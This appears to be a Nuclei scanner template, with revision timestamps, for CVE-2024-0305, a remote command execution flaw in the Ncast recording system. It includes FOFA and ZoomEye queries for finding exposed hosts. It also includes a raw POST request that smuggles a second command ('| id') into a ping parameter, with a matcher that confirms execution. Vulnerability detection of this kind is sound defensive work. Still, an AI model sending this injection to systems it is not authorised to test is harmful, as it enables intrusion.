2024-02-26 07:35:11 +00:00
id : CVE-2024-0305
info :
name : Ncast busiFacade - Remote Command Execution
author : BMCel
2024-02-26 09:04:04 +00:00
severity : high
2024-02-26 07:35:11 +00:00
description : |
The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
impact : |
Allows remote attackers to execute arbitrary code on the affected system.
reference :
- https://cxsecurity.com/cveshow/CVE-2024-0305
2024-02-27 06:11:40 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-0305
2024-02-26 09:04:04 +00:00
- https://vuldb.com/?id.249872
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2024-0305
epss-score : 0.00064
epss-percentile : 0.2597
cpe : cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
2024-02-26 07:35:11 +00:00
metadata :
max-request : 1
2024-02-27 06:11:40 +00:00
verified : true
2024-02-26 09:04:04 +00:00
vendor : ncast_project
product : ncast
2024-02-26 07:35:11 +00:00
fofa-query : app="Ncast-产品" && title=="高清智能录播系统"
2024-02-26 09:04:04 +00:00
zoomeye-query : title:"高清智能录播系统"
tags : cve,cve2024,ncast,rce
2024-02-26 07:35:11 +00:00
http :
- raw :
- |
POST /classes/common/busiFacade.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
{"name" : "ping" , "serviceName" : "SysManager" , "userTransaction" : false , "param" : [ "ping 127.0.0.1 | id" ] }
matchers-condition : and
matchers :
2024-02-26 09:04:04 +00:00
- type : regex
2024-02-26 07:35:11 +00:00
part : body
2024-02-26 09:04:04 +00:00
regex :
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
2024-02-27 06:11:40 +00:00
- "#str"
2024-02-26 09:04:04 +00:00
condition : and
2024-02-26 07:35:11 +00:00
- type : status
status :
- 200